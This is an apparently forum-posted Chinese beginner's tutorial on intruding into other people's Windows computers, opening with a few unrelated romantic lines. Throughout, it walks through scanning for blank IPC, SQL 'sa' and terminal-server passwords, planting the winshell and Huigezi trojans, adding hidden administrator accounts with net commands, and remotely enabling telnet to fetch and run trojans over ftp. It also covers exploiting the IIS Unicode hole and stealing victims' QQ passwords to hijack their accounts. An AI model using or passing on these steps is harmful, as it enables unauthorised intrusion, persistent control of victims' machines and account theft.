菜鸟常用详细教程.txt如果我穷得还剩下一碗饭我也会让你先吃饱全天下最好的东西都应 该归我所有，包括你！ 先说喜欢我能死啊?别闹，听话。 有本事你就照顾好自己， 不然就老老实实地让我来照顾你！ 看到论坛里有部分会员问的都是一些怎样入侵对方电 脑的问题。想了许久，我决定自己提笔写一篇文章，总结我几个月来接触这个领域的一点经 验，希望能对跟我一样菜的菜鸟们点帮助。这也是我第一次写文章，有些地方难免会出现错 误，如有不明地方可以提出来。好！废话就不多说了，开始步入正题吧！开始之前先请各位统装98的改装NT以上系统， 因为下面用到的一些命令和软件在98下是行不通的。通常得到管理员权限才能说入侵控制了对方计算机，所以下面的入侵方 法都能得到管理员权限。说句题外话，我用的是win2000,所以操作都是在这个系统通过的。1. 不用说，肯定是 IPC 弱口令啦，真不明白网上为什么会有那么多这种人见人爱车见车载的 计算机，随便一扫都能扫出一大堆。首先，打开流光4.7,记得要打IP补丁啊，不然不能扫 国内的主机，这样是很不爽的，要来个通杀嘛，呵呵。点击“探测-高级扫描工具”，出现一 个方框，输入一段IP,检测项目中只需在IPC前面打钩。点“确定一开始”就开始探测了。 如果你的IP段够好的话，很快就可以在最下面的方框里看到结果。哈哈真是多啊，基本 上都是空口令。好，现在就开始入侵了，点击“工具一NT/IIS工具一种植者”，填入刚才扫 描得到的结果，选一个应用程序文件，我常用的是独孤剑客的winshell（下面提到的都是默 认设置）， 5K 大小，是我 56K 猫的最爱！你也可以上传灰鸽子，这种木马挺不错的，能自 动解析域名上线，还可以避过防火墙。一分钟后，我传上去的 winshell 运行了，很自然的打 开cmd.exe，打上nc IP 5277提示输入密码，输入设置winshell时的密码（默认为空），回 车就进入对方电脑了。这时出现cmd提示符，输入i （安装winshell）再输入s （进入cmd）， 再再输入“net start winshell”（后台服务，开机自动运行）。完成前面的步骤后，才算是 真正进去了。进去干嘛呢？嗯这确实是个很高深的问题想干什么就给你们去想 吧。不过，呵呵，我还是想说几句，推荐找到他的tencent目录，找到他的QQ号码，加他为 好友，方便以后长期控制他（肉机啊）。如果他不肯通过你的请求，那就用狠一点的手段，利 用流光种植者再上传一个QQ杀手，把他的QQ密码偷到手。得到他的密码之后就 就用他的QQ登陆，再用自己的私人QQ提交好友请求。爽吧加多一句废话，如果他 还没申请密码保护，那就好心点，帮他申请啦，不过邮箱记得要用自己的啊！2. 3389。请各位注意，我这里并不是说什么烂鬼输入法漏洞。这种漏洞差不多已经绝迹了， 太难找了，如果有人找到了，那恭喜你啦，证明你今天时运高，记得要买彩票啊！众所周知 有开 3389 的一般都是服务器，也就是说有很大可能带局域网的，而内部入侵比外部要方便一 点。如何能快速方便的得到开了终端的肉机呢？这需要用到两个工具，都是扫描工具来的， scanner3.0和焦点的xscan。打开scanner，输入一段IP,范围要大一点，scanner速度很 快的。在“所有端口从”那里都填3389，点击“开始”就可以开工了。跟QQ上的好友聊了 几句之后，铛扫描完成，结果出来了。点击右下脚的“删除”把多余的IP删了，只留 下开了 3389的IP。再点击“保存”，把结果保存到文件夹里。找到保存文件的目录，打开它。 用记事本的替换功能把它保存为一个纯IP的TXT文件。“编辑一替换”在“查找内容”里输 入要删除的垃圾，再点“全部替换”就行了。打开xscan，点击左边的蓝色按钮，进入“扫 描板块”，只需在“SQL-Server弱口令” “NT-Server弱口令”前打钩，其他都清除掉。再点 击右边的蓝色按钮，进入“扫描参数”，钩上“从文件获取主机列表”，打开刚才替换成纯IP 的TXT文件，确定之后就可以扫描了。这时需要比较长的时间！去论坛灌灌水，跟MM说几句 话吧，不要傻等就行了。确定目标，用mstsc （登陆终端的工具）登陆对方主机后，打开对 方cmd.exe,输入“netuse”，先看看有没有人也在连接这部机（安全一点好，）“net view” 命令之后当出现一堆前面带字符的就表示就表示什么呢？我想大家都非常明白吧！ 这时你就可以在那部计算机里下载并装个像“网络执行官”之类的局域网控制软件。碰到这 样的计算机一定要珍惜啊，要充分利用利用。3. sa 空口令。这时又要用到流光了，点击“探测-扫描 POP3/FTP/NT/SQL 主机”，扫描主机类 型设为SQL，把“将FrontPage主机自动加入HTTP列表”去掉。扫描结果出来了之后，用鼠 标左键单击某一个结果，点两下“连接”就会出现一个方框，“Type Command at Prompt”提 示符是SQLCMD。打入一个命令“net user要创建的用户名密码/add”（这是创建一个用 户），再打一个“net localgroup administrators刚创建的用户名/add”（把创建的用户加 到 administrators 组）。创建了用户当然是用流光种植者上传后门啦，填入资料，点确定， 但却提示上传文件失败，再检查一下IP,用户名，密码，并没有错啊。咚咚告诉你们 吧，这是因为对方删除了 IPC$，种植者需要IPC连接，你当然上传不了文件啦。这时候就要 动用另一种工具，它的特点是：不依赖于目标的ipc$放与否远程开启/关闭目标telnet服 务，这就是“rtcs.vbs”。在cmd输入：“cscript RTCS.vbs目标IP用户名 密码NTLM验证 方式telnet服务端口”，当出现“to getashelll”时就表示成功了，你就可以“telnet IP 服务端口”了，简单吧!！如果你想上传木马，也很简单，只要登陆ftp服务器（要有你要下 载的木马服务端）。这些可以找网上的肉机，弱密码的实在太多了，或用自己部机做服务器也 可以，后面我会详细介绍。telnet上对方，输入“ft pf tp服务器IP”用户名密码进入，“ get 木马服务端”就下载来了。“bye”退出ftp，输入木马文件名回车就运行了，以后你就可以 用木马控制他了。4. U 漏洞。这种漏洞现在虽然很少，但还是可以比较轻松的扫描到，用这种方法黑网站确实 很轻松。但我们这次说的并不是如何黑网站，而是如何取得管理员权限。首先，启动流光， 选择“探测一扫描POP3/FTP/NT/SQL主机”，“扫描主机类型”为NT/98。等一段时间（看你 扫描IP多少来看）扫描完成后。如果你能在中间的方框里看到黑色的小电脑，就说明你已经 得到了存在U漏洞的主机了。双击iiscrk （小金的作品），在“当前连接”处添上刚才扫描 得到的主机，其他设置一般默认行了，不行，换其他方式试试。点击左边第一个图标连接IIS 主机，如果成功，你就会在最下边的方框看到对方主机目录。要当心啊，具有删读的权限， 不要乱破坏（警告）。好，现在开始真正工作了。单击左数第六个图标“tftp”，如何做我就 不多说了，里面说得明明白白。不过，要上传什么文件我还是要说的，这个就是iiscrk自带 的idq.dll，把它上传到cripts目录,成功后。在cmd输入“ispc对方IP/scripts/idq.dll ”（ISPC每次执行一个命令要打3次回车）。成功登陆到对方后，你就有了 system权限。用我 上面提到的方法创建用户并加他到 administrators 组。我要补充的是，一般你连接上去时出 现的目录都是可执行目录，文件可放在里面。本来我打算写多几种方法的，但没有什么时间，现在我连打开电脑的时间都受到了限制（痛 苦ing）。因为这次期中考考得实在是#!唉，有一科还是老师好心，送我几分 我才及格（太惭愧了）。看来要以后啦。上面提到的软件如果本站没有下载，www.google.com搜索。推荐几个不错的东东，适合菜鸟（我也经常用）： DameWare Mini Remote Control （远程桌面控制）Loader （我主要是用它来改QQ端口，因为我经常用代理啊）BlackICE PC Protection （防火墙）MsgSend （发信息用）QQ 代理（不用我说，你们肯定知道是干嘛的）ttyip （隐藏自己在论坛、留言本、计数器、WEB聊天室、网页的真实IP）